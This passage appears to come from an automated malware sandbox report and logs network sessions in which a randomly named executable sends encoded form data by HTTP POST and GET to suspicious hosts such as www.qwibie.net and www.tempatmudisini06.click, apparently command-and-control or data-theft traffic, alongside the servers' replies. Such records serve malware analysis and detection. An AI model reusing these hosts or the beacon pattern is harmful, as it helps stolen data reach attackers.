                                                                    Data Ascii: C0oD=6B2XbJA1M3hVDHkXWN/V5hdh0aOxTNtVUeS0PVORz+XwRIvWr3gSA7Vo2wuQgyq7AOJAYBP5aZE8NcdhUEogCZsJeT3RpVPlRTI2UrCRtSGXhuu1rIvfq1XIgNvYOP+19vy0Ttzffb3PhegV/swrHgmmVcMdyHqpTSgOsbLnh/yqbT92OGNN6XE9Szg2oZj5PI4JAN8J69wGbsV2KF+obMA6s68m0sMCS5JTCQD21ZzA4TyXWkCsrvAwA0oRg351fdfss6eBt64SN1OpfsmiUvxY7/0DX0amf63yjm8r9NccYimPjKO8i7APVmTYTPsQqqQk79zq8rSkLRl7pEU2vaexMZJrd4HTXL48G6S7RpTiqJN4uwyIbKC8N9v5aA6ysI8Q4Yj8C3CNOMRbQOHxp4+1y9tc8vydrNxQeARg3GT0whVrTnWVfOBT7/nAqD+KKAsQtYL7+WK+sk6JB9HMDG4WIRGrfAlQl7OOA6Uq6cpONPVzdpZ2VbJ4idfoUsUSI3rIYdEhCAZdREhUidfu5O2lqwAAa7qCWFSR1TMCWd/sWcb5n6EEjpDPA4sVNynrIQBeVM6iRyP2W5PorpUstKpsafWZIWg5hmVZpMZcoZrG+spCyv0LiomrFa6rqUTjZOoXdcbRbDuclNpesZYwLBdNOJNscYFlONG5XPJekb1YhTzYM8tqUkscOsUi0oItJmtJMPbBbJS0QO5k7ANQLC3KxHvotZI92KNc4shZhO/NLfAduenjRpfVCEV+TISXMkuxH04u2FBktYxfv8VbsqHv1tAX9MqLH9XEorgGZewX+D4X9OQTvgovSGs3X3Uif1kYYxH1cRuynr07AqG7dtIVPhvtEBAmRBYeQ0MBLXai9Dd8TRjA0GFC/i1NBTfc5K2YTP7VMF3mE9X1/WsrYVMigNLOGLAyilvAYPqepMYGg1gJziiMoUkzWjw/DeQ6+tZmYa4t3ISa6sC5IlgU2KP5vodroAin7a+AKAmjomCHt1R [TRUNCATED]
                                                                    Nov 12, 2024 18:49:10.419212103 CET302INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Tue, 12 Nov 2024 17:49:10 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "6693de8b-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.45002238.47.207.164804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:12.011303902 CET535OUTGET /pmk2/?C0oD=3De3Y80JIFpHXFcRK4zsuRoR2JqTRvVObOTBM3no2IT+Ydj8n3o/JZofxiKD9jGsDaNhY1uQAIUnKpNiMGMuE6w7CVHn6nbaXTI3bq+rgxbHjMuEgJndnnM=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Host: www.t19yd.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Nov 12, 2024 18:49:12.961158037 CET302INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Tue, 12 Nov 2024 17:49:12 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "6693de8b-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.4500233.33.130.190804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:18.220218897 CET791OUTPOST /ow2x/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.qwibie.net
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 201
                                                                    Connection: close
                                                                    Origin: http://www.qwibie.net
                                                                    Referer: http://www.qwibie.net/ow2x/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 72 79 73 70 4d 46 6f 75 73 52 6e 33 66 69 4e 54 6c 42 36 62 33 73 56 39 56 6c 66 44 42 46 4c 6b 72 4c 6d 32 4b 5a 2b 31 55 6f 79 55 41 6a 69 44 6d 65 57 6a 6a 45 63 70 33 4d 4a 62 61 46 36 2b 63 38 35 6f 32 47 47 37 38 2f 77 4f 33 71 59 5a 56 32 70 4d 4d 54 39 67 4c 68 59 49 33 4e 37 39 68 55 5a 56 4b 6b 6d 6c 7a 73 74 67 58 43 2b 77 69 58 58 75 6e 53 44 6c 48 43 53 65 49 55 78 49 55 35 4e 2f 4f 42 58 4c 34 65 4b 37 4b 75 47 64 59 79 73 6c 47 38 57 61 36 78 6d 39 65 72 4b 6b 56 30 72 47 70 77 58 48 38 49 4b 38 6a 4d 78 32 4b 54 4e 6d 77 46 35 79 4a 73 36 73 30 32 50 6f 69 77 3d 3d
                                                                    Data Ascii: C0oD=ryspMFousRn3fiNTlB6b3sV9VlfDBFLkrLm2KZ+1UoyUAjiDmeWjjEcp3MJbaF6+c85o2GG78/wO3qYZV2pMMT9gLhYI3N79hUZVKkmlzstgXC+wiXXunSDlHCSeIUxIU5N/OBXL4eK7KuGdYyslG8Wa6xm9erKkV0rGpwXH8IK8jMx2KTNmwF5yJs6s02Poiw==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.4500243.33.130.190804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:20.760190964 CET811OUTPOST /ow2x/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.qwibie.net
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 221
                                                                    Connection: close
                                                                    Origin: http://www.qwibie.net
                                                                    Referer: http://www.qwibie.net/ow2x/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 72 79 73 70 4d 46 6f 75 73 52 6e 33 65 43 39 54 67 69 43 62 2f 73 56 2b 57 6c 66 44 4b 6c 4c 2f 72 4b 61 32 4b 59 36 6c 58 62 57 55 44 43 79 44 6e 62 32 6a 6b 45 63 70 34 63 4a 6b 48 56 36 70 63 38 46 65 32 44 2b 37 38 2f 30 4f 33 75 63 5a 55 47 56 50 4b 44 39 75 43 42 59 4f 6f 64 37 39 68 55 5a 56 4b 6b 61 62 7a 73 6c 67 57 79 4f 77 6a 32 58 74 71 79 44 69 51 79 53 65 4d 55 77 67 55 35 4e 4e 4f 41 4c 68 34 63 43 37 4b 76 57 64 59 47 34 6b 50 38 58 66 2b 78 6e 6f 64 70 54 42 50 48 4b 53 67 44 50 36 79 35 4b 4e 69 4b 38 73 62 69 73 78 69 46 64 42 55 72 7a 59 35 31 79 68 35 36 54 2f 75 42 33 71 65 2f 30 7a 67 48 61 33 46 6f 64 71 37 6c 49 3d
                                                                    Data Ascii: C0oD=ryspMFousRn3eC9TgiCb/sV+WlfDKlL/rKa2KY6lXbWUDCyDnb2jkEcp4cJkHV6pc8Fe2D+78/0O3ucZUGVPKD9uCBYOod79hUZVKkabzslgWyOwj2XtqyDiQySeMUwgU5NNOALh4cC7KvWdYG4kP8Xf+xnodpTBPHKSgDP6y5KNiK8sbisxiFdBUrzY51yh56T/uB3qe/0zgHa3Fodq7lI=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.4500253.33.130.190804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:23.304402113 CET10893OUTPOST /ow2x/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.qwibie.net
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 10301
                                                                    Connection: close
                                                                    Origin: http://www.qwibie.net
                                                                    Referer: http://www.qwibie.net/ow2x/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 72 79 73 70 4d 46 6f 75 73 52 6e 33 65 43 39 54 67 69 43 62 2f 73 56 2b 57 6c 66 44 4b 6c 4c 2f 72 4b 61 32 4b 59 36 6c 58 62 65 55 44 77 71 44 6d 36 32 6a 6c 45 63 70 2b 73 4a 68 48 56 37 72 63 38 73 58 32 44 37 4f 38 39 38 4f 31 4c 49 5a 46 46 4e 50 44 44 39 75 50 68 59 50 33 4e 37 6f 68 55 4a 5a 4b 6c 32 62 7a 73 6c 67 57 78 57 77 6c 6e 58 74 6f 79 44 6c 48 43 53 53 49 55 78 4e 55 34 6f 34 4f 41 2f 62 34 73 69 37 4b 50 6d 64 61 56 51 6b 4e 63 58 52 79 52 6d 72 64 70 76 53 50 48 6d 65 67 41 54 55 79 35 2b 4e 69 4c 46 61 43 7a 78 72 67 6c 64 2f 4b 4a 6e 68 36 43 4b 59 30 39 53 46 75 43 62 76 64 75 51 38 37 32 7a 6c 51 71 4a 66 75 69 2f 68 36 38 51 71 56 36 6d 38 62 4d 32 70 2f 64 76 6a 54 47 58 6a 43 37 57 42 48 66 61 34 54 61 79 50 68 67 44 62 66 6a 63 68 72 74 65 74 6e 6d 44 38 61 50 37 32 52 64 45 35 4c 2b 6c 6a 64 45 46 65 64 45 67 57 68 71 59 45 44 46 6d 58 52 61 2b 2f 66 4a 37 4f 71 46 36 44 47 71 4e 7a 4c 47 5a 44 68 54 42 44 2f 55 42 33 7a 79 6e 63 49 6a 50 7a 76 64 71 79 51 [TRUNCATED]
                                                                    Data Ascii: C0oD=ryspMFousRn3eC9TgiCb/sV+WlfDKlL/rKa2KY6lXbeUDwqDm62jlEcp+sJhHV7rc8sX2D7O898O1LIZFFNPDD9uPhYP3N7ohUJZKl2bzslgWxWwlnXtoyDlHCSSIUxNU4o4OA/b4si7KPmdaVQkNcXRyRmrdpvSPHmegATUy5+NiLFaCzxrgld/KJnh6CKY09SFuCbvduQ872zlQqJfui/h68QqV6m8bM2p/dvjTGXjC7WBHfa4TayPhgDbfjchrtetnmD8aP72RdE5L+ljdEFedEgWhqYEDFmXRa+/fJ7OqF6DGqNzLGZDhTBD/UB3zyncIjPzvdqyQouI32M6ZK/OIzJk0bT3qaz49pm8GsL59ybXOwc3Ipy2SOKdoxkrR9y0WDViTdCc7FD8HDg0dXphPvJczRqayOclFSXZ5HCg/9ESfmB0iRopTb1czXaMBPvgXKDFg/DadbYg4YS2opJfRJ0eCoOX02CUV7dCyH6du5a6ykgG6p6WgiGZ88j0+f/xe2FC9jDZT81Z8aTjvPbTLjxKk+RMz50dX7xzhBvJo+z413VqtEGOmUjQzNJK+R35GMPVp+k/AHBSbmsKYhcRaRdSz0ufhVtOS8Fcd8+BTnZ8rUwbJy66POUe7iz+unZ5s8JyyMKk//eohyOOjcYWwYwrYanPeHEulZKF3lS5Ef6XXWGXB3s0GBlgF5CQLRCoAca5vUJ+UxSe2LsUW+ILhFcDuRkqmgliJdQmtzB5biwuJX+bu+UYp78UqfdEF2b8WKVw6714cYJESexaRTz1W6gd7pdm+UVoodXbymEwStHUdRcdQpuSNFwabL0uSffStvLjBaujyQra2vvgbTkh+1LIRQ9Bl8UpONAOeOVEfLhXzQzPlyUpWjNyFW9u0CN4gouffnWAGzTnGiGgZVzPaT3WxPdTzq0FkqtpEB9JRgHCycnFypZ9xNtbKjucuHJdbF1tgX/xh6fxoEYtAS3P16Kt2PCPm+IJduTp3mjxKdM [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.4500263.33.130.190804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:25.854284048 CET536OUTGET /ow2x/?C0oD=mwEJPxghqBP0HS9n1X+CrOIbCVLsB2OYlrv9OZrAb/GKMQe/j/2ClGpq87hpEmyNapVO3nqvych02uE3cVtiKilbfBQm7ePgulBUbiKMxe88UCqWlHKJoDI=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Host: www.qwibie.net
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Nov 12, 2024 18:49:26.482073069 CET402INHTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Tue, 12 Nov 2024 17:49:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 262
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 43 30 6f 44 3d 6d 77 45 4a 50 78 67 68 71 42 50 30 48 53 39 6e 31 58 2b 43 72 4f 49 62 43 56 4c 73 42 32 4f 59 6c 72 76 39 4f 5a 72 41 62 2f 47 4b 4d 51 65 2f 6a 2f 32 43 6c 47 70 71 38 37 68 70 45 6d 79 4e 61 70 56 4f 33 6e 71 76 79 63 68 30 32 75 45 33 63 56 74 69 4b 69 6c 62 66 42 51 6d 37 65 50 67 75 6c 42 55 62 69 4b 4d 78 65 38 38 55 43 71 57 6c 48 4b 4a 6f 44 49 3d 26 53 4a 4c 74 79 3d 37 5a 73 6c 38 62 41 48 71 64 6b 48 45 6e 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?C0oD=mwEJPxghqBP0HS9n1X+CrOIbCVLsB2OYlrv9OZrAb/GKMQe/j/2ClGpq87hpEmyNapVO3nqvych02uE3cVtiKilbfBQm7ePgulBUbiKMxe88UCqWlHKJoDI=&SJLty=7Zsl8bAHqdkHEnH"}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.450027103.21.221.4804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:31.569828987 CET827OUTPOST /kfzf/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.tempatmudisini06.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 201
                                                                    Connection: close
                                                                    Origin: http://www.tempatmudisini06.click
                                                                    Referer: http://www.tempatmudisini06.click/kfzf/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 32 36 52 34 38 58 71 6c 73 56 52 34 57 47 4e 51 6c 4d 79 34 64 44 61 77 6b 79 72 61 74 6c 61 61 32 2f 49 57 30 73 4f 34 6c 59 63 78 6a 37 63 45 43 34 68 32 32 7a 36 6f 4f 4e 37 70 62 6f 7a 43 6f 43 44 4e 71 4f 34 78 78 53 7a 6c 5a 49 35 6f 6f 44 69 48 4c 6b 31 2f 79 51 42 69 57 63 48 4d 52 62 78 72 59 2b 55 76 6d 41 56 30 53 63 2f 67 54 64 69 63 32 62 65 77 5a 78 48 2f 53 52 63 6e 31 31 76 76 57 71 46 6b 6c 47 4d 72 79 75 34 41 42 45 47 6a 57 6a 39 54 57 6b 39 34 42 4e 61 65 47 59 35 63 62 79 69 65 34 6a 74 6f 35 75 6f 43 31 63 73 73 35 5a 61 35 79 43 62 67 33 66 4d 58 4e 51 3d 3d
                                                                    Data Ascii: C0oD=26R48XqlsVR4WGNQlMy4dDawkyratlaa2/IW0sO4lYcxj7cEC4h22z6oON7pbozCoCDNqO4xxSzlZI5ooDiHLk1/yQBiWcHMRbxrY+UvmAV0Sc/gTdic2bewZxH/SRcn11vvWqFklGMryu4ABEGjWj9TWk94BNaeGY5cbyie4jto5uoC1css5Za5yCbg3fMXNQ==
                                                                    Nov 12, 2024 18:49:32.575869083 CET1033INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Tue, 12 Nov 2024 17:49:32 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.450028103.21.221.4804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:34.119739056 CET847OUTPOST /kfzf/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.tempatmudisini06.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 221
                                                                    Connection: close
                                                                    Origin: http://www.tempatmudisini06.click
                                                                    Referer: http://www.tempatmudisini06.click/kfzf/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 32 36 52 34 38 58 71 6c 73 56 52 34 58 6e 39 51 6a 76 61 34 63 6a 61 2f 36 69 72 61 32 31 61 65 32 2f 30 57 30 74 4c 6e 6b 71 49 78 6a 61 4d 45 59 39 4e 32 7a 7a 36 6f 47 74 37 73 47 59 79 4f 6f 43 50 46 71 50 55 78 78 53 6e 6c 5a 4a 70 6f 6f 77 36 45 4b 30 31 35 2b 77 41 45 62 38 48 4d 52 62 78 72 59 36 46 49 6d 41 64 30 54 76 33 67 53 34 65 54 37 37 65 7a 65 78 48 2f 57 52 63 6a 31 31 76 64 57 72 4a 43 6c 46 34 72 79 76 49 41 43 52 36 73 59 6a 39 52 53 6b 38 49 42 4d 6d 58 4a 70 64 57 54 54 65 78 36 77 68 31 38 6f 6c 59 6b 74 4e 37 72 5a 2b 4b 76 46 53 55 36 63 78 65 57 61 64 4f 71 56 67 44 53 65 71 4b 78 79 2f 52 70 54 57 58 4e 66 59 3d
                                                                    Data Ascii: C0oD=26R48XqlsVR4Xn9Qjva4cja/6ira21ae2/0W0tLnkqIxjaMEY9N2zz6oGt7sGYyOoCPFqPUxxSnlZJpoow6EK015+wAEb8HMRbxrY6FImAd0Tv3gS4eT77ezexH/WRcj11vdWrJClF4ryvIACR6sYj9RSk8IBMmXJpdWTTex6wh18olYktN7rZ+KvFSU6cxeWadOqVgDSeqKxy/RpTWXNfY=
                                                                    Nov 12, 2024 18:49:35.112253904 CET1033INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Tue, 12 Nov 2024 17:49:34 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.450029103.21.221.4804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:36.668064117 CET10929OUTPOST /kfzf/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.tempatmudisini06.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 10301
                                                                    Connection: close
                                                                    Origin: http://www.tempatmudisini06.click
                                                                    Referer: http://www.tempatmudisini06.click/kfzf/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
